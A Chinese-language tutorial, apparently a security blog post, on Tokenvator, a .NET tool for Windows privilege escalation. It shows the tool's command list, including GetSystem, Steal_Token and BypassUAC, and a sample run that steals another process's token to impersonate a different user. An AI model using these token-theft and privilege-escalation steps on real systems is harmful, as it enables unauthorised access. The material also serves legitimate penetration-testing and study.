如何使用Tokenvator和Windows Tokens实现提权

今天给大家介绍的是一款名叫Tokenvator的工具，该工具采用.NET开发，可用于在Windows系统中提权。

工具下载

下载地址：【GitHub传送门】

基本使用

Tokenvator可以直接在交互式终端中运行，具体的执行命令能够以命令行参数的形式提供。在交互模式下，可以用tab键补全命令，或双击tab键获取帮助信息。

C:\Users\badjuju>Tokenvator.exe (Tokens)> help Name                     Optional            Required ----                     --------            -------- GetSystem                Command             - GetTrustedInstaller      Command             - Steal_Token              Command             ProcessID BypassUAC                ProcessID           Command List_Privileges          ProcessID           - Set_Privilege            ProcessID           Privilege List_Processes           -                   - List_Processes_WMI       -                   - Find_User_Processes      -                   User Find_User_Processes_WMI  -                   User List_User_Sessions       -                   - WhoAmI                   -                   - RevertToSelf             -                   - Run                      -                   Command   (Tokens)> WhoAmI Name                     Optional            Required ----                     --------            -------- WhoAmI                   -                   -   (Tokens)> WhoAmI [*]Operating as LAB\badjuju

下面大部分截图显示的是在交互模式下的命令运行情况：

Steal_Token

从最基本的功能来说，Tokenvator可以用来访问并修改Windows认证令牌，为了获取到特定进程的令牌，我们需要结合目标进程的PID来运行Steal_Token命令。

(Tokens)> Steal_Token Name                     Optional            Required ----                     --------            -------- Steal_Token              Command             ProcessID   (Tokens)> Steal_Token 7384 [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token to: SeDebugPrivilege [*]Impersonating 7384 [+]Recieved Handle for:  (7384) [+]Process Handle: 824 [+]Primary Token Handle: 828 [+]Duplicate Token Handle: 824   (Tokens)> whoami [*]Operating as lab\backup